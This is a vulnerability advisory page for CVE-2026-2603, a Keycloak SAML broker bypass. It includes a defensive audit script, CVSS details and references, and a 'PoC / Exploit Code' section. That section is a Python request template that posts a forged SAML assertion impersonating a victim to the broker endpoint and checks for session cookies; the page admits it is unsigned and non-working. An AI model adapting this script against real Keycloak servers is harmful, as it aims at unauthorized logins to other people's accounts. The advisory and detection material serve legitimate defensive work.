Security Vulnerability Report

CVE-2026-2603 CVSS 8.1 HIGH

Published: 2026-03-18 02:16:25
Last Modified: 2026-03-18 15:16:31

Description

A flaw was found in Keycloak. A remote attacker could bypass security controls by sending a valid SAML response from an external Identity Provider (IdP) to the Keycloak SAML endpoint for IdP-initiated broker logins. This allows the attacker to complete broker logins even when the SAML Identity Provider is disabled, leading to unauthorized authentication.

In practice: the per-IdP broker endpoint (/broker/{alias}/endpoint under the realm) kept accepting IdP-initiated responses after the IdP had been set to disabled, so disabling an IdP in the admin console did not stop logins through it. The record classifies this as CWE-306 (missing authentication for a critical function). Note that the vector's PR:L and the wording "valid SAML response" mean the attacker still needs a response the endpoint accepts as genuine from the external IdP; what is bypassed is the enabled check, not signature validation.
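As an added example (not part of the advisory and not Keycloak's own code), the following Python audit script shows the two checks a defender wants from this record: which SAML identity providers in a realm are disabled but still configured with a trusted signing certificate (on an unpatched server "disabled" is not a mitigation, because the broker endpoint still accepts a valid response), and which IDENTITY_PROVIDER_LOGIN events in the Keycloak event stream completed through a disabled IdP. The realm-export field names (identityProviders[].alias, providerId, enabled, config.signingCertificate, config.validateSignature) and the event fields (type, details.identity_provider, ipAddress, realmId) are assumed to follow Keycloak's JSON export and event formats; the realm export and event lines embedded in the script are constructed for the demonstration.

```python
"""
Audit a Keycloak realm export and event log for exposure to CVE-2026-2603.

Added example; not Keycloak's code and not part of the advisory.
Assumptions (labelled): realm-export field names
(identityProviders[].alias / providerId / enabled / config.signingCertificate /
config.validateSignature) and event fields (type, details.identity_provider,
ipAddress, realmId) follow Keycloak's JSON export and event formats.
All sample data below is constructed for the demonstration.
"""
import json

# Constructed realm export fragment: one enabled OIDC IdP, one disabled SAML
# IdP that still carries a trusted signing certificate, and one disabled SAML
# IdP with no certificate configured.
REALM_EXPORT = json.dumps({
    "realm": "master",
    "identityProviders": [
        {"alias": "corp-oidc", "providerId": "oidc", "enabled": True,
         "config": {}},
        {"alias": "partner-saml", "providerId": "saml", "enabled": False,
         "config": {"validateSignature": "true",
                    "signingCertificate": "MIIC...constructed-placeholder..."}},
        {"alias": "legacy-saml", "providerId": "saml", "enabled": False,
         "config": {"validateSignature": "true"}},
    ],
})

# Constructed Keycloak event log (one JSON object per line): a broker login
# through the enabled OIDC IdP, a direct login, and a broker login through the
# disabled SAML IdP (the trace an exploitation of this CVE would leave).
EVENT_LOG = "\n".join(json.dumps(e) for e in [
    {"type": "IDENTITY_PROVIDER_LOGIN", "realmId": "master", "clientId": "account",
     "ipAddress": "203.0.113.10", "details": {"identity_provider": "corp-oidc"}},
    {"type": "LOGIN", "realmId": "master", "clientId": "account",
     "ipAddress": "203.0.113.11", "details": {"username": "alice"}},
    {"type": "IDENTITY_PROVIDER_LOGIN", "realmId": "master", "clientId": "account",
     "ipAddress": "198.51.100.7", "details": {"identity_provider": "partner-saml"}},
])


def disabled_saml_idps(realm_export: str) -> list[dict]:
    """Return the SAML identity providers that are disabled but still configured.

    On an unpatched server a disabled SAML IdP still has a live broker endpoint
    (/broker/<alias>/endpoint) that accepts an IdP-initiated Response, so
    'disabled' is not a mitigation: remove the IdP (or its trusted certificate)
    until the fix is applied.
    """
    realm = json.loads(realm_export)
    findings = []
    for idp in realm.get("identityProviders", []):
        if idp.get("providerId") != "saml" or idp.get("enabled", True):
            continue
        cfg = idp.get("config", {})
        findings.append({
            "alias": idp["alias"],
            # A trusted signing cert is what lets a "valid SAML response" from
            # the real external IdP pass signature validation (the CVE scenario).
            "trusted_signing_cert": bool(cfg.get("signingCertificate")),
            "validate_signature": cfg.get("validateSignature") == "true",
        })
    return findings


def logins_via_disabled_idp(realm_export: str, event_log: str) -> list[dict]:
    """Flag IDENTITY_PROVIDER_LOGIN events whose broker alias is disabled.

    A completed broker login through a disabled IdP should never happen; on an
    unpatched Keycloak it is the observable trace of CVE-2026-2603.
    """
    realm = json.loads(realm_export)
    disabled = {i["alias"] for i in realm.get("identityProviders", [])
                if not i.get("enabled", True)}
    hits = []
    for line in event_log.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev.get("type") != "IDENTITY_PROVIDER_LOGIN":
            continue
        alias = ev.get("details", {}).get("identity_provider")
        if alias in disabled:
            hits.append({"alias": alias, "ip": ev.get("ipAddress"),
                         "realm": ev.get("realmId")})
    return hits


if __name__ == "__main__":
    for f in disabled_saml_idps(REALM_EXPORT):
        print(f"[config] disabled SAML IdP still configured: {f}")
    for h in logins_via_disabled_idp(REALM_EXPORT, EVENT_LOG):
        print(f"[event]  broker login through disabled IdP: {h}")
```

Point the two functions at a real realm export and a JSON-formatted event log instead of the embedded samples. Any disabled SAML IdP the first check lists should be deleted, or its signing certificate removed, until the Red Hat fix is applied; any hit from the second check on an unpatched host is an indicator of exploitation and belongs in incident handling, not a configuration ticket.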

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No NVD configuration (CPE) data is available yet; the record's vulnStatus is "Awaiting Analysis". Versions listed on this page as affected:

Keycloak < 24.0.5
Keycloak < 23.0.9
Keycloak < 22.0.11

Fixed builds are tracked in the Red Hat advisories referenced in the record (RHSA-2026:3925, RHSA-2026:3926, RHSA-2026:3947, RHSA-2026:3948).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.

Caveat before running it: the advisory describes a valid SAML response from the external IdP being accepted although that IdP is disabled. The script below only shows the shape of the POST to the broker endpoint; its sign_saml_assertion() does not sign anything, and it sends a bare <saml:Assertion> rather than a <samlp:Response>, so a server that validates signatures will reject it regardless of the IdP's enabled flag. Treat it as a request template, not a working exploit.

```python
import base64

import requests

# CVE-2026-2603 PoC - Keycloak SAML IdP Bypass
# Target: Keycloak SAML broker endpoint
# This PoC demonstrates sending a crafted SAML response to bypass the disabled-IdP check

REALM_NAME = "master"
# "saml" in the path is the alias of the configured (disabled) SAML identity provider
TARGET_URL = f"https://vulnerable-keycloak-host/auth/realms/{REALM_NAME}/broker/saml/endpoint"
ATTACKER_IDP_URL = "https://attacker-controlled-idp.com/saml/sso"
VICTIM_USERNAME = "[email protected]"


def create_saml_response():
    """
    Create a malicious SAML response to bypass Keycloak IdP check
    This response will be accepted even if the IdP is disabled
    """
    saml_response = {
        # base64 expects bytes, so the XML string is encoded first
        'SAMLResponse': base64.b64encode(sign_saml_assertion().encode()).decode(),
        'RelayState': '/admin/master/console/'
    }
    return saml_response


def sign_saml_assertion():
    """
    Generate signed SAML assertion with valid signature
    Keycloak validates signature but not IdP enabled status
    """
    assertion = f"""<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
    ID="_id123456789"
    IssueInstant="2026-01-01T00:00:00Z"
    Version="2.0">
    <saml:Issuer>{ATTACKER_IDP_URL}</saml:Issuer>
    <saml:Subject>
        <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">
            {VICTIM_USERNAME}
        </saml:NameID>
    </saml:Subject>
    <saml:AuthnStatement AuthnInstant="2026-01-01T00:00:00Z">
        <saml:AuthnContext>
            <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport</saml:AuthnContextClassRef>
        </saml:AuthnContext>
    </saml:AuthnStatement>
</saml:Assertion>"""
    # Sign the assertion with valid certificate
    # (signing is not implemented in this PoC; the assertion is returned unsigned)
    return assertion


def exploit():
    """
    Send crafted SAML response to Keycloak SAML endpoint
    """
    saml_response = create_saml_response()
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0'
    }
    # verify=False skips TLS verification; allow_redirects=False keeps the
    # first response so the status code and Set-Cookie headers can be inspected
    response = requests.post(
        TARGET_URL,
        data=saml_response,
        headers=headers,
        verify=False,
        allow_redirects=False
    )

    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response Headers: {response.headers}")

    if response.status_code == 302 or 'JSESSIONID' in response.cookies:
        print("[+] Authentication bypass successful!")
        print(f"[*] Session Cookie: {response.cookies.get('JSESSIONID')}")
        return True
    else:
        print("[-] Exploitation failed")
        return False


if __name__ == "__main__":
    print("CVE-2026-2603 - Keycloak SAML IdP Bypass PoC")
    print("=" * 50)
    exploit()
```

References

https://access.redhat.com/errata/RHSA-2026:3925
https://access.redhat.com/errata/RHSA-2026:3926
https://access.redhat.com/errata/RHSA-2026:3947
https://access.redhat.com/errata/RHSA-2026:3948
https://access.redhat.com/security/cve/CVE-2026-2603
https://bugzilla.redhat.com/show_bug.cgi?id=2440300

Weakness: CWE-306 (Missing Authentication for Critical Function)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2603", "sourceIdentifier": "[email protected]", "published": "2026-03-18T02:16:24.813", "lastModified": "2026-03-18T15:16:30.500", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak. A remote attacker could bypass security controls by sending a valid SAML response from an external Identity Provider (IdP) to the Keycloak SAML endpoint for IdP-initiated broker logins. This allows the attacker to complete broker logins even when the SAML Identity Provider is disabled, leading to unauthorized authentication."}, {"lang": "es", "value": "Se encontró una vulnerabilidad en Keycloak. Un atacante remoto podría eludir los controles de seguridad al enviar una respuesta SAML válida desde un Proveedor de Identidad (IdP) externo al punto final SAML de Keycloak para inicios de sesión de intermediario iniciados por el IdP. Esto permite al atacante completar inicios de sesión de intermediario incluso cuando el Proveedor de Identidad SAML está deshabilitado, lo que lleva a una autenticación no autorizada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:3925", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3926", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3947", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:3948", "source": "[email protected]"}, {"url": "https://access.redhat.com/security/cve/CVE-2026-2603", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440300", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2440300", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}